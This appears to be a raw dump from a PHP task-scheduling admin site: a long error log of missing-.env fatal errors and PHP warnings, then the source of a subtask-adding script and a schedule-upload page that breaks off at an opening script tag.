/home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [12-Sep-2025 11:46:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [12-Sep-2025 11:56:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [12-Sep-2025 11:56:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [12-Sep-2025 12:08:06 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [13-Sep-2025 13:34:11 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [13-Sep-2025 13:34:15 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [13-Sep-2025 13:34:15 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [13-Sep-2025 13:42:27 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [13-Sep-2025 13:42:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewservice.php on line 149 [13-Sep-2025 13:42:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewservice.php on line 155 [13-Sep-2025 13:43:01 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [13-Sep-2025 18:24:43 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [13-Sep-2025 18:24:46 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [13-Sep-2025 18:24:46 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [13-Sep-2025 18:32:54 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [13-Sep-2025 18:32:54 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [09-Oct-2025 20:24:10 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ScheduleService.php(13): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_schedule.php(10): ScheduleService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [11-Oct-2025 07:53:18 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/SubtaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_subtask.php(6): SubtaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [11-Oct-2025 07:53:18 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ScheduleService.php(13): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_schedule.php(10): ScheduleService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [11-Oct-2025 07:53:19 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/TaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_task.php(7): TaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [11-Oct-2025 07:53:26 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/SubtaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_subtask.php(6): SubtaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [11-Oct-2025 07:53:27 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ScheduleService.php(13): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_schedule.php(10): ScheduleService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [11-Oct-2025 07:53:28 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/TaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_task.php(7): TaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [11-Oct-2025 07:53:35 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/SubtaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_subtask.php(6): SubtaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [11-Oct-2025 07:53:36 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ScheduleService.php(13): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_schedule.php(10): ScheduleService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [11-Oct-2025 07:53:37 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/TaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_task.php(7): TaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [11-Oct-2025 07:53:46 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/SubtaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_subtask.php(6): SubtaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [11-Oct-2025 07:53:47 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ScheduleService.php(13): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_schedule.php(10): ScheduleService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [11-Oct-2025 07:53:48 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/TaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_task.php(7): TaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [11-Oct-2025 07:53:58 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/SubtaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_subtask.php(6): SubtaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [11-Oct-2025 07:54:00 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ScheduleService.php(13): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_schedule.php(10): ScheduleService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [11-Oct-2025 07:54:01 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/TaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_task.php(7): TaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [11-Oct-2025 08:54:27 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/SubtaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_subtask.php(6): SubtaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [11-Oct-2025 08:54:27 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ScheduleService.php(13): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_schedule.php(10): ScheduleService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [11-Oct-2025 08:54:35 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/SubtaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_subtask.php(6): SubtaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [11-Oct-2025 08:54:36 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ScheduleService.php(13): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_schedule.php(10): ScheduleService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [11-Oct-2025 08:54:45 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/SubtaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_subtask.php(6): SubtaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [11-Oct-2025 08:54:46 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ScheduleService.php(13): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_schedule.php(10): ScheduleService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [11-Oct-2025 08:54:55 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/SubtaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_subtask.php(6): SubtaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [11-Oct-2025 08:54:57 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ScheduleService.php(13): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_schedule.php(10): ScheduleService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [11-Oct-2025 08:55:07 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/SubtaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_subtask.php(6): SubtaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [11-Oct-2025 08:55:10 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ScheduleService.php(13): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_schedule.php(10): ScheduleService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [14-Oct-2025 03:57:54 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ScheduleService.php(13): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_schedule.php(10): ScheduleService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [15-Apr-2026 11:01:21 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/TaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_task.php(7): TaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [15-Apr-2026 11:01:26 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ScheduleService.php(13): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_schedule.php(10): ScheduleService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [15-Apr-2026 11:01:27 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/SubtaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_subtask.php(6): SubtaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [15-Apr-2026 11:01:34 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/SubtaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/ignore_subtasks.php(7): SubtaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 emeraadmin/add_subtask.php000064400000002236151676701240011657 0ustar00<?php // Check if the request method is POST if ($_SERVER['REQUEST_METHOD'] === 'POST') { require_once '../../Classes/Subtask.php'; require_once '../../Service/SubtaskService.php'; require_once '../../Service/TaskService.php'; // Retrieve and sanitize input data $task_id = $_POST['task_id']; $service_id = $_POST['service_name']; $subtask_date = $_POST['subtask_date']; $subtask_time = isset($_POST['subtask_time']) ? $_POST['subtask_time'] : null; $now = new DateTime(); $created_at = $now->format('Y-m-d H:i:s'); $updated_at = $now->format('Y-m-d H:i:s'); // Create a new Subtask object $subtask = new Subtask('', $task_id, $service_id, $subtask_date, $subtask_time,$created_at,$updated_at,0,"",0,"","",""); // Instantiate SubtaskService $subtaskService = new SubtaskService(); // Replace with your SubtaskService class instantiation // Attempt to add the subtask if ($subtaskService->addSubtask($subtask)) { echo "Subtask added successfully!"; } else { echo "Failed to add subtask."; } } else { echo "Invalid request method."; } ?> emeraadmin/uploadSchedule.php000064400000015246151676701240012341 0ustar00<?php include('head.php'); ?> <div class="main-content"> <div class="container-fluid"> <div class="page-header"> <div class="row align-items-end"> <div class="col-lg-8"> <div class="page-header-title"> <i class="ik ik-upload bg-blue"></i> <div class="d-inline"> <h5>Upload Schedules</h5> <span>Upload schedules via CSV or Excel files</span> </div> </div> </div> <div class="col-lg-4"></div> </div> </div> <div class="card"> <div class="card-header"> <h3>Upload Schedules</h3> </div> <div class="card-body"> <div id="drop-area" class="drop-area"> <form id="uploadForm" class="my-form" enctype="multipart/form-data"> <p>Drag and drop your file here, or click to select it.</p> <input type="file" name="csv_file" id="csv_file" accept=".csv, .xls, .xlsx"> <!-- Hidden current user id --> <input type="hidden" name="current_user_id" value="<?php echo $companyId; ?>"> </form> </div> <button id="uploadBtn" class="btn btn-primary">Upload</button> <div id="overlay" class="overlay"> <div class="loader"></div> <p>Uploading...</p> </div> <div id="responseMessage"></div> </div> </div> </div> </div> <style> .drop-area { border: 2px dashed #ccc; padding: 20px; text-align: center; transition: border .3s ease-in-out; } .drop-area.highlight { border-color: #007bff; } .button { display: inline-block; padding: 8px 20px; background-color: #007bff; color: #fff; cursor: pointer; border-radius: 4px; margin-top: 10px; } .button:hover { background-color: #0056b3; } .overlay { display: none; position: fixed; top: 0; left: 0; width: 100%; height: 100%; background-color: rgba(0, 0, 0, 0.5); justify-content: center; align-items: center; z-index: 999; } .overlay .loader { border: 6px solid #f3f3f3; border-radius: 50%; border-top: 6px solid #3498db; width: 50px; height: 50px; animation: spin 1s linear infinite; } @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } } </style> <!-- SweetAlert CDN --> <script src="https://cdn.jsdelivr.net/npm/sweetalert2@11"></script> <script> 